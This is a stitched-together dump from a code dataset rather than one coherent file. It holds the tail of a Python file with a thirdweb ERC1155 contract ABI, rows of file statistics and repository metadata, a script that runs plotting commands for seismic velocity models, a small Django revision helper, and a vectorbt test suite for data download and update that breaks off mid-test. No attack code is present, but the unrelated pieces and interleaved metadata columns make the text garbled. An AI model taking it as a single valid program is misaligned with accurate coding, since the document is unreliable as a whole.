","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"internalType":"uint256[]","name":"amounts","type":"uint256[]"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeBatchTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index_0","type":"uint256"}],"name":"saleRecipientForToken","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uri","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_royaltyRecipient","type":"address"},{"internalType":"uint256","name":"_royaltyBps","type":"uint256"}],"name":"setDefaultRoyaltyInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_newOwner","type":"address"}],"name":"setOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":
"setPlatformFeeInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_saleRecipient","type":"address"}],"name":"setPrimarySaleRecipient","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"address","name":"_recipient","type":"address"},{"internalType":"uint256","name":"_bps","type":"uint256"}],"name":"setRoyaltyInfoForToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"thirdwebFee","outputs":[{"internalType":"contract ITWFee","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index_0","type":"uint256"}],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"uri","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"add
ress","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC1155.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"verify","outputs":[{"internalType":"bool","name":"","type":"bool"},{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]' # noqa: E501 (line-too-long)
        )
# pylint: disable=too-many-lines
| 38.185083
| 17,681
| 0.640738
| 18,526
| 179,699
| 5.942783
| 0.024722
| 0.075207
| 0.04269
| 0.040982
| 0.885573
| 0.85152
| 0.818431
| 0.795651
| 0.786041
| 0.726984
| 0
| 0.006738
| 0.245166
| 179,699
| 4,705
| 17,682
| 38.193199
| 0.804922
| 0.147764
| 0
| 0.765383
| 1
| 0.000303
| 0.132752
| 0.123734
| 0
| 0
| 0
| 0
| 0.022128
| 1
| 0.086087
| false
| 0.000909
| 0.004547
| 0
| 0.190058
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
35b51f320b9d2ab7462f870092016faf67fc75bd
| 2,332
|
py
|
Python
|
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | null | null | null |
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | 4
|
2021-11-30T08:28:42.000Z
|
2022-03-07T21:27:14.000Z
|
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | 1
|
2021-06-05T03:28:51.000Z
|
2021-06-05T03:28:51.000Z
|
#!/usr/bin/env python
"""Generate Vp-vs-density scatter plots for several velocity models.

Each step shells out to ``makemapgrid.py`` to extract a grid of material
properties over a fixed northern-California bounding box, then to
``plot_scatter_plot.py`` to render the Vp/density scatter plot from the
resulting grid file.
"""
import sys
import os

# Bounding box and spacing shared by every extraction command.
REGION = "-b 30.5,-126.0 -u 42.5,-112.5 -s 1.00"


def run(cmd):
    """Execute *cmd* in a shell, then echo it (same order as the original)."""
    os.system(cmd)
    print(cmd)


def main():
    # Combined cencal,cca,cvmsi model at 0 m depth.
    run("makemapgrid.py %s -e 0.0 -c cencal,cca,cvmsi -o norcal_map_grid_0.txt" % REGION)
    run("plot_scatter_plot.py -i ./norcal_map_grid_0.txt -e 0.0 "
        "-n \"CS18.4 Vp Density Scatter Plot 0k\" -o nocal_vp_versus_density_0km.png")
    # Overall density vs vp for the combined model at 1000 m depth.
    # NOTE(review): this title says CS18.5 while the 0 m plot says CS18.4 —
    # confirm which model label is intended.
    run("makemapgrid.py %s -e 1000.0 -c cencal,cca,cvmsi -o norcal_map_grid_1000.txt" % REGION)
    run("plot_scatter_plot.py -i ./norcal_map_grid_1000.txt "
        "-n \"CS18.5 Vp Density Scatter Plot 1000km\" -o nocal_vp_versus_density_1000km.png")
    # Test the density rule for each individual model at 1000 m depth.
    # The original repeated this command pair per model; the cca/cvms5/cvmsi
    # plot titles said "_0_km" despite the 1000 m depth (copy-paste bug) —
    # all titles now consistently use "_1000_km".
    for model in ("cencal", "cca", "cvms5", "cvmsi", "cvmh"):
        run("makemapgrid.py %s -e 1000.0 -c %s -o %s_map_grid_1000.txt"
            % (REGION, model, model))
        run("plot_scatter_plot.py -i ./%s_map_grid_1000.txt -e 1000.0 "
            "-n %s_map_grid_1000_km -o %s_vp_versus_density_1000km.png"
            % (model, model, model))
    sys.exit(0)


if __name__ == "__main__":
    main()
| 31.945205
| 140
| 0.734991
| 502
| 2,332
| 3.207171
| 0.11753
| 0.082609
| 0.095652
| 0.13913
| 0.862112
| 0.771429
| 0.771429
| 0.771429
| 0.688199
| 0.660248
| 0
| 0.137646
| 0.118353
| 2,332
| 72
| 141
| 32.388889
| 0.645428
| 0.093482
| 0
| 0.622222
| 0
| 0.266667
| 0.715102
| 0.289185
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.044444
| 0.311111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea7bd18bdf960d9d225de6fc86f64617e8327661
| 192
|
py
|
Python
|
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
from dealer.auto import auto as dealer_auto
from django.conf import settings
def dealer():
    """Return the working-tree revision reported by the ``dealer`` package."""
    revision = dealer_auto.revision
    return revision
# Sentinel so an explicitly configured ``REVISION_ID = None`` is respected.
_MISSING = object()


def auto():
    """Return ``settings.REVISION_ID`` if present, else fall back to ``dealer()``.

    The original ``getattr(settings, 'REVISION_ID', dealer())`` evaluated
    ``dealer()`` (which inspects the VCS) on every call, even when the
    setting was defined; the fallback is now only computed when needed.
    """
    revision = getattr(settings, 'REVISION_ID', _MISSING)
    return dealer() if revision is _MISSING else revision
| 19.2
| 53
| 0.75
| 27
| 192
| 5.222222
| 0.481481
| 0.212766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161458
| 192
| 10
| 53
| 19.2
| 0.875776
| 0
| 0
| 0
| 0
| 0
| 0.056995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
57690d6157014b1e34d98d59644bbf068d352a85
| 38,264
|
py
|
Python
|
tests/test_data.py
|
emiliobasualdo/vectorbt
|
b538dc67e2b027110694d4876d4aa723c1b929dc
|
[
"Apache-2.0"
] | 1
|
2021-03-28T23:59:08.000Z
|
2021-03-28T23:59:08.000Z
|
tests/test_data.py
|
dougransom/vectorbt
|
44968ac579a1420f713df326eb730bae93041622
|
[
"Apache-2.0"
] | null | null | null |
tests/test_data.py
|
dougransom/vectorbt
|
44968ac579a1420f713df326eb730bae93041622
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
from datetime import datetime, timedelta
import pytest
import vectorbt as vbt
from vectorbt.utils.config import merge_dicts
seed = 42
# ############# base.py ############# #
class MyData(vbt.Data):
    """Deterministic fake data source used to exercise ``vbt.Data``.

    Values are drawn from a seeded RNG and offset by the numeric symbol,
    so the exact floats asserted by the tests below are reproducible.
    """

    @classmethod
    def download_symbol(cls, symbol, shape=(5, 3), start_date=datetime(2020, 1, 1), columns=None, index_mask=None,
                        column_mask=None, return_arr=False, tz_localize=None, seed=seed):
        """Build deterministic fake data for *symbol*.

        :param symbol: numeric symbol; added to every generated value
        :param shape: 1-d shape yields a Series, 2-d a DataFrame
        :param start_date: first timestamp of the daily index
        :param columns: Series name / DataFrame columns
        :param index_mask: optional boolean mask applied to the rows
        :param column_mask: optional boolean mask applied to the columns
            (DataFrame case only)
        :param return_arr: if True, return the raw ndarray without an index
        :param tz_localize: optional timezone to localize the index to
        :param seed: RNG seed (defaults to the module-level ``seed``)
        """
        np.random.seed(seed)
        # Offset by the symbol so different symbols yield distinct data.
        a = np.random.uniform(size=shape) + symbol
        if return_arr:
            return a
        # Daily index starting at start_date, one entry per generated row.
        index = [start_date + timedelta(days=i) for i in range(a.shape[0])]
        if a.ndim == 1:
            sr = pd.Series(a, index=index, name=columns)
            if index_mask is not None:
                sr = sr.loc[index_mask]
            if tz_localize is not None:
                sr = sr.tz_localize(tz_localize)
            return sr
        df = pd.DataFrame(a, index=index, columns=columns)
        if index_mask is not None:
            df = df.loc[index_mask]
        if column_mask is not None:
            df = df.loc[:, column_mask]
        if tz_localize is not None:
            df = df.tz_localize(tz_localize)
        return df

    def update_symbol(self, symbol, n=1, **kwargs):
        """Generate *n* new rows continuing from the last stored timestamp.

        Re-downloads starting at the last existing index value with a bumped
        seed, so updated rows differ from the originally downloaded ones.
        """
        download_kwargs = self.select_symbol_kwargs(symbol, self.download_kwargs)
        download_kwargs['start_date'] = self.data[symbol].index[-1]
        shape = download_kwargs.pop('shape', (5, 3))
        new_shape = (n, shape[1]) if len(shape) > 1 else (n,)
        # Bump the seed so the update is not identical to the original data.
        new_seed = download_kwargs.pop('seed', seed) + 1
        kwargs = merge_dicts(download_kwargs, kwargs)
        return self.download_symbol(symbol, shape=new_shape, seed=new_seed, **kwargs)
class TestData:
    """Integration tests for `vbt.Data` exercised through the deterministic
    `MyData` subclass: serialization, download, update, concat, get, indexing."""
    def test_config(self, tmp_path):
        """dumps/loads and save/load round-trips must preserve equality."""
        data = MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])
        assert MyData.loads(data.dumps()) == data
        data.save(tmp_path / 'data')
        assert MyData.load(tmp_path / 'data') == data
    def test_download(self):
        """download() must build the expected raw arrays, Series/DataFrames,
        tz-aware indexes, and honor missing_index/missing_columns policies
        ('nan', 'drop') while rejecting 'raise' and unknown values."""
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), return_arr=True).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ]
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3), return_arr=True).data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
                ]
            )
        )
        index = pd.DatetimeIndex(
            ['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
            dtype='datetime64[ns]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,)).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), columns='feat0').data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index,
                name='feat0'
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3)).data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
                ],
                index=index,
                columns=pd.Index(['feat0', 'feat1', 'feat2'], dtype='object'))
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,)).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,)).data[1],
            pd.Series(
                [
                    1.3745401188473625,
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366,
                    1.15601864044243652
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3)).data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3)).data[1],
            pd.DataFrame(
                [
                    [1.3745401188473625, 1.9507143064099162, 1.7319939418114051],
                    [1.5986584841970366, 1.15601864044243652, 1.15599452033620265],
                    [1.05808361216819946, 1.8661761457749352, 1.6011150117432088],
                    [1.7080725777960455, 1.020584494295802447, 1.9699098521619943],
                    [1.8324426408004217, 1.21233911067827616, 1.18182496720710062]
                ],
                index=index
            )
        )
        # UTC data converted to Europe/Berlin shifts the clock by +1 hour.
        tzaware_index = pd.DatetimeIndex(
            [
                '2020-01-01 01:00:00',
                '2020-01-02 01:00:00',
                '2020-01-03 01:00:00',
                '2020-01-04 01:00:00',
                '2020-01-05 01:00:00'
            ],
            dtype='datetime64[ns, Europe/Berlin]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), tz_localize='UTC', tz_convert='Europe/Berlin').data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=tzaware_index
            )
        )
        # Per-symbol masks: symbol 0 misses the first row, symbol 1 the last.
        index_mask = vbt.symbol_dict({
            0: [False, True, True, True, True],
            1: [True, True, True, True, False]
        })
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan').data[0],
            pd.Series(
                [
                    np.nan,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan').data[1],
            pd.Series(
                [
                    1.3745401188473625,
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366,
                    np.nan
                ],
                index=index
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop').data[0],
            pd.Series(
                [
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366
                ],
                index=index[1:4]
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop').data[1],
            pd.Series(
                [
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366
                ],
                index=index[1:4]
            )
        )
        column_mask = vbt.symbol_dict({
            0: [False, True, True],
            1: [True, True, False]
        })
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan').data[0],
            pd.DataFrame(
                [
                    [np.nan, np.nan, np.nan],
                    [np.nan, 0.15601864044243652, 0.15599452033620265],
                    [np.nan, 0.8661761457749352, 0.6011150117432088],
                    [np.nan, 0.020584494295802447, 0.9699098521619943],
                    [np.nan, 0.21233911067827616, 0.18182496720710062]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan').data[1],
            pd.DataFrame(
                [
                    [1.3745401188473625, 1.9507143064099162, np.nan],
                    [1.5986584841970366, 1.15601864044243652, np.nan],
                    [1.05808361216819946, 1.8661761457749352, np.nan],
                    [1.7080725777960455, 1.020584494295802447, np.nan],
                    [np.nan, np.nan, np.nan]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop').data[0],
            pd.DataFrame(
                [
                    [0.15601864044243652],
                    [0.8661761457749352],
                    [0.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop').data[1],
            pd.DataFrame(
                [
                    [1.15601864044243652],
                    [1.8661761457749352],
                    [1.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
        # 'raise' and unrecognized policy names must error out.
        with pytest.raises(Exception) as e_info:
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='raise', missing_columns='nan')
        with pytest.raises(Exception) as e_info:
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='raise')
        with pytest.raises(Exception) as e_info:
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='test', missing_columns='nan')
        with pytest.raises(Exception) as e_info:
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='test')
    def test_update(self):
        """update(n=...) must append n freshly-seeded rows, extend the index,
        preserve tz-awareness, and respect per-symbol index/column masks."""
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), return_arr=True).update().data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896
                ]
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), return_arr=True).update(n=2).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896,
                    0.6090665392794814
                ]
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3), return_arr=True).update().data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.11505456638977896, 0.6090665392794814, 0.13339096418598828]
                ]
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3), return_arr=True).update(n=2).data[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.11505456638977896, 0.6090665392794814, 0.13339096418598828],
                    [0.24058961996534878, 0.3271390558111398, 0.8591374909485977]
                ]
            )
        )
        index = pd.DatetimeIndex(
            ['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
            dtype='datetime64[ns]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,)).update().data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896
                ],
                index=index
            )
        )
        index2 = pd.DatetimeIndex(
            ['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05', '2020-01-06'],
            dtype='datetime64[ns]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,)).update(n=2).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896,
                    0.6090665392794814
                ],
                index=index2
            )
        )
        tzaware_index = pd.DatetimeIndex(
            [
                '2020-01-01 01:00:00',
                '2020-01-02 01:00:00',
                '2020-01-03 01:00:00',
                '2020-01-04 01:00:00',
                '2020-01-05 01:00:00'
            ],
            dtype='datetime64[ns, Europe/Berlin]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), tz_localize='UTC', tz_convert='Europe/Berlin')
            .update(tz_localize=None).data[0],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896
                ],
                index=tzaware_index
            )
        )
        index_mask = vbt.symbol_dict({
            0: [False, True, True, True, True],
            1: [True, True, True, True, False]
        })
        update_index_mask = vbt.symbol_dict({
            0: [True],
            1: [False]
        })
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
            .update(index_mask=update_index_mask).data[0],
            pd.Series(
                [
                    np.nan,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896
                ],
                index=index
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
            .update(index_mask=update_index_mask).data[1],
            pd.Series(
                [
                    1.3745401188473625,
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366,
                    np.nan
                ],
                index=index
            )
        )
        update_index_mask2 = vbt.symbol_dict({
            0: [True, False],
            1: [False, True]
        })
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
            .update(n=2, index_mask=update_index_mask2).data[0],
            pd.Series(
                [
                    np.nan,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.11505456638977896,
                    np.nan
                ],
                index=index2
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
            .update(n=2, index_mask=update_index_mask2).data[1],
            pd.Series(
                [
                    1.3745401188473625,
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366,
                    np.nan,
                    1.6090665392794814
                ],
                index=index2
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
            .update(index_mask=update_index_mask).data[0],
            pd.Series(
                [
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366
                ],
                index=index[1:4]
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
            .update(index_mask=update_index_mask).data[1],
            pd.Series(
                [
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366
                ],
                index=index[1:4]
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
            .update(n=2, index_mask=update_index_mask2).data[0],
            pd.Series(
                [
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366
                ],
                index=index[1:4]
            )
        )
        pd.testing.assert_series_equal(
            MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
            .update(n=2, index_mask=update_index_mask2).data[1],
            pd.Series(
                [
                    1.9507143064099162,
                    1.7319939418114051,
                    1.5986584841970366
                ],
                index=index[1:4]
            )
        )
        column_mask = vbt.symbol_dict({
            0: [False, True, True],
            1: [True, True, False]
        })
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan')
            .update(index_mask=update_index_mask).data[0],
            pd.DataFrame(
                [
                    [np.nan, np.nan, np.nan],
                    [np.nan, 0.15601864044243652, 0.15599452033620265],
                    [np.nan, 0.8661761457749352, 0.6011150117432088],
                    [np.nan, 0.020584494295802447, 0.9699098521619943],
                    [np.nan, 0.6090665392794814, 0.13339096418598828]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan')
            .update(index_mask=update_index_mask).data[1],
            pd.DataFrame(
                [
                    [1.3745401188473625, 1.9507143064099162, np.nan],
                    [1.5986584841970366, 1.15601864044243652, np.nan],
                    [1.05808361216819946, 1.8661761457749352, np.nan],
                    [1.7080725777960455, 1.020584494295802447, np.nan],
                    [np.nan, np.nan, np.nan]
                ],
                index=index
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan')
            .update(n=2, index_mask=update_index_mask2).data[0],
            pd.DataFrame(
                [
                    [np.nan, np.nan, np.nan],
                    [np.nan, 0.15601864044243652, 0.15599452033620265],
                    [np.nan, 0.8661761457749352, 0.6011150117432088],
                    [np.nan, 0.020584494295802447, 0.9699098521619943],
                    [np.nan, 0.6090665392794814, 0.13339096418598828],
                    [np.nan, np.nan, np.nan]
                ],
                index=index2
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='nan', missing_columns='nan')
            .update(n=2, index_mask=update_index_mask2).data[1],
            pd.DataFrame(
                [
                    [1.3745401188473625, 1.9507143064099162, np.nan],
                    [1.5986584841970366, 1.15601864044243652, np.nan],
                    [1.05808361216819946, 1.8661761457749352, np.nan],
